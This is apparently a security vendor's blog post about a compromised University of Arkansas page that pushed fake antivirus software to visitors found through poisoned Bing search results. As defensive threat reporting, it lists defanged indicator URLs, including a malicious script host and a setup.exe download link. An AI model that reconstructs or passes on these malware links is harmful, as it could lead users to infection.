Yet Another Reputable Site Asks You to Install Rogue AV

Print Friendly, PDF & Email

Posted by: Barracuda Labs

Yet another reputable site has fallen victim to compromise — University of Arkansas.

This Tuesday, Barracuda’s Malicious Javascript Detection engine (MJD) identified Rogue AV software being distributed from a page that belongs to the University of Arkansas Web site. When users accessed a particular page from the university Web site, it opened a window warning them about their computer being infected with viruses and then subsequently downloaded an anti-virus software which was identified to be a fake anti-virus software.

A forensic analysis of the attack revealed that the user requested the following:

hxxp://bumperscollege.uark.edu/ssp_director/inc/html/d/georgia-inmate-query.html

which in turn requested a javascript from a malicious domain via script include:

hxxp://xrusx.com/counter.php?sref=bumperscollege.uark.edu/ssp_director/inc/html/d/georgia-inmate-query.html

which contained further malicious javascript includes that generated fake warning messages on the user’s computer.

setup.exe was linked off another malicious domain:

hxxp://www.loker.us/forum/attachments/setup.exe

While investigating deep into the tracks of the user to determine how the user got to this page, we made yet another interesting discovery. Our investigation could not find user browsing a page linking directly off Universityof Arkansas linking the malicious page that was distributing the Rogue AV. Instead, it was a Bing search result that lead user to this page. Specifically, one customer using the Barracuda Purewire Web Security Service searched for ‘georigainmatequery’ on Microsoft Bing search engine.

hxxp://www.bing.com/search?q=georgiainmatequery

As you can see, the malicious link from uArk.edu shows up in the bing search results — and in the number two spot. The page is leveraging uArk.edu’s reputation ranking in what we’ve previously reported on as SEO poisoning (see previous post). This is becoming increasingly more popular as hackers are targeting vulnerabilities in legitimate Web sites since it makes the malicious page more likely to be visited. While search engines have been proactively adding malware scanning in their arsenal, legitimate Web site owners also need to take proactive steps to keep their site free of such malicious content.

Customers using the Barracuda Purewire Web Security Service are protected from this attack.

Scroll to top
Tweet
Share
Share